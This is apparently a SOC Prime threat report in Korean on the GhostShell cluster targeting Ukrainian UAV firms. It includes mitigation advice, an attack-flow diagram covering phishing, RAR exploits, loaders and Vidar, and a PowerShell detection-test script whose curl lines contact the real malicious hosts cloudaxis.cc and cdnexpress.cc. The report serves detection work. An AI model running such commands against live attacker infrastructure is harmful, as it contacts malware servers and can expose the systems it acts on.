GhostShell (MB-0009): 우크라이나의 UAV 작전 및 방위 공급망 겨냥

SOC Prime Team

팔로우

GhostShell (MB-0009): 우크라이나의 UAV 작전 및 방위 공급망 겨냥

Detection stack

AIDR
Alert
ETL
Query

위협 보고서
공격 흐름
탐지
시뮬레이션

개요

새로 추적된 위협 클러스터인 고스트쉘(GhostShell)은 우크라이나의 UAV 및 광범위한 드론 생태계를 목표로 하고 있습니다. 이 작전은 mTLS로 인증된 임플란트와 메모리에 상주하는 로더를 포함한 고급 악성코드를 사용합니다. 초기 접근을 위해 공격자는 우크라이나 드론 회사를 사칭하는 미끼 문서에 의존합니다.

조사

분석가는 VBS 스크립트를 중심으로 구축된 다단계 침입 체인을 발견했으며, mTLS 기능이 있는 임플란트로는 122.exe와, Telegram 기반 로더인 update.exe가 있습니다. 리버스 엔지니어링을 통해 커스텀 XOR 복호화 로직, 내장된 개인 PKI, 그리고 비밀 터널링을 위해 Xray Core의 사용이 드러났습니다. 조사에서는 같은 인프라 내에서 Vidar 정보탈취 활동도 확인되었습니다.

완화

조직은 엄격한 mTLS 인증서 검증을 시행하고, 클라이언트 인증서의 무단 사용을 모니터링해야 합니다. 엔드포인트 가시성을 향상시켜 메모리 내 로딩을 감지하고, ntdll.dll 훅 해제, 그리고 Windows 실행 키 지속성에 대한 의심스러운 변경사항을 감시해야 합니다. 팀은 또한 알려진 명령 및 제어 도메인과 Telegram을 통한 구성 수집에 대한 비정상적인 아웃바운드 트래픽을 모니터링해야 합니다.

대응

감염된 시스템은 즉시 격리 후 메모리 포렌식을 수행하여 메모리에 임플란트가 있는지 식별해야 합니다. 네트워크 로그는 cloudaxis.cc and cdnexpress.cc와 관련된 트래픽을 검토해야 합니다. 보안 팀은 또한 언급된 SHA-256 해시를 사냥하고, 특정 mTLS 클라이언트 인증서 CN=ed6e62814295701f.

"graph TB %% Class Definitions Section classDef action fill:#99ccff classDef tool fill:#cccccc classDef malware fill:#ff9999 classDef process fill:#ccffcc classDef network fill:#ffff99 classDef operator fill:#ff9900 %% Initial Access and Execution Phase action_phishing["Action – T1566.001 Phishing: Spearphishing Attachment Description: Social engineering using decoy PDF documents impersonating Besomar to target UAV ecosystem."] class action_phishing action action_exploit["Action – T1203 Exploitation for Client Execution Description: Exploiting CVE-2025-8088 and CVE-2025-6218 via malicious archive Besomar_documentation.rar."] class action_exploit action process_vbs["Process – T1059.005 Command and Scripting Interpreter: Visual Basic Description: VBS file dropped into Windows Startup folder executing Base64-encoded strings via ExecuteGlobal."] class process_vbs process %% Persistence and Payload Download action_persistence_startup["Action – T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder Description: VBS file placed in Startup folder for persistence."] class action_persistence_startup action network_download["Network – T1105 Ingress Tool Transfer Description: Downloading secondary payloads from cloudaxis.cc."] class network_download network op_branch(("AND")) class op_branch operator %% Path 1: 122.exe malware_122["Name: 122.exe Description: Loader that decrypts an embedded PE using XOR and executes it in memory."] class malware_122 malware action_fingerprint["Action: Host Fingerprinting Description: Collecting computer name, username, and PID."] class action_fingerprint action network_c2_122["C2 Communication: cdnexpress.cc Description: Uses unique mTLS client certificate for authentication."] class network_c2_122 network action_screen_cap["Action: Screen Capture Description: Capturing screens via GDI+."] class action_screen_cap action action_persistence_reg["Action: Registry Run Keys Description: Establishing persistence via Windows Registry Run keys."] class action_persistence_reg action %% Path 2: update.exe malware_update["Name: update.exe Description: In-memory loader retrieving C2 config from Telegram."] class malware_update malware action_anti_analysis["Action: T1562.001 Impair Defenses: Disable or Modify Tools Description: Unhooking EDR/monitoring tools by patching ntdll.dll."] class action_anti_analysis action action_metasploit_stager["Action: T1059.003 Command and Scripting Interpreter: Windows Command Shell Description: Executes a Metasploit-style HTTPS stager in memory."] class action_metasploit_stager action %% Path 3: 22.exe and Vidar malware_22["Name: 22.exe Description: Multi-stage launcher utilizing Xray Core client."] class malware_22 malware network_vless["Network: T1573 Encrypted Channel Description: Tunneling traffic via a VLESS connection."] class network_vless network malware_vidar["Name: Vidar Malware Description: Credential and data theft tool targeting browser passwords, cookies, wallets, and messaging artifacts."] class malware_vidar malware %% Connection Logic action_phishing –>|leads_to| action_exploit action_exploit –>|results_in| process_vbs process_vbs –>|uses| action_persistence_startup action_persistence_startup –>|triggers| network_download network_download –>|delivers| op_branch %% Branching to payloads op_branch –>|payload_1| malware_122 op_branch –>|payload_2| malware_update op_branch –>|payload_3| malware_22 %% 122.exe flow malware_122 –>|performs| action_fingerprint malware_122 –>|communicates_with| network_c2_122 malware_122 –>|capable_of| action_screen_cap malware_122 –>|ensures| action_persistence_reg %% update.exe flow malware_update –>|retrieves_config_from| action_anti_analysis action_anti_analysis –>|executes| action_metasploit_stager %% 22.exe flow malware_22 –>|tunnels_via| network_vless network_vless –>|deploys| malware_vidar "

공격 흐름

공격 내러티브 및 명령: 공격자는 초기 발판을 확보했으며, 목표에 대한 통제를 확고히 하기 위해 특수 페이로드(122.exe)를 다운로드하려고 합니다. 저프로파일을 유지하기 위해, 악성코드는 탈취되거나 겉으로 보기에는 합법적으로 보이는 CDN 도메인(cloudaxis.cc)을 사용합니다. 다운로드가 완료되면, 악성코드는 특정 분석 엔드포인트(cdnexpress.cc/analytics)를 통해 명령 및 제어(C2) 인프라로 텔레메트리를 보낼 시도를 합니다. 시뮬레이션은 curl 을 사용하여 이러한 특정 GET 요청을 모방하고 URI 기반 탐지 논리를 유발합니다.

회귀 테스트 스크립트:

# GhostShell 페이로드 다운로드 시뮬레이션
Write-Host "[+] GhostShell 페이로드 다운로드 시뮬레이션 중..."
curl.exe -I "https://cloudaxis.cc/gsmft/yueu/fkvqld/tvqqwh/ushu/122.exe"

# GhostShell C2 통신 시뮬레이션 (분석)
Write-Host "[+] GhostShell C2 통신 시뮬레이션 중..."
curl.exe -I "https://cdnexpress.cc/analytics"

정리 명령:

# 이 시뮬레이션에서는 실제로 파일이 다운로드되지 않습니다 (-I 옵션을 사용하여 헤더만).
# 시스템에 지속적인 변경은 없습니다.
Write-Host "[+] 시뮬레이션 완료. 정리 불필요."

SOC Prime의 Detection as Code 플랫폼에 가입하세요 귀사의 비즈니스에 가장 중요한 위협에 대한 가시성을 개선하세요. 시작을 돕고 즉각적인 가치를 제공하기 위해 지금 SOC Prime 전문가와의 회의를 예약하세요.

무료 가입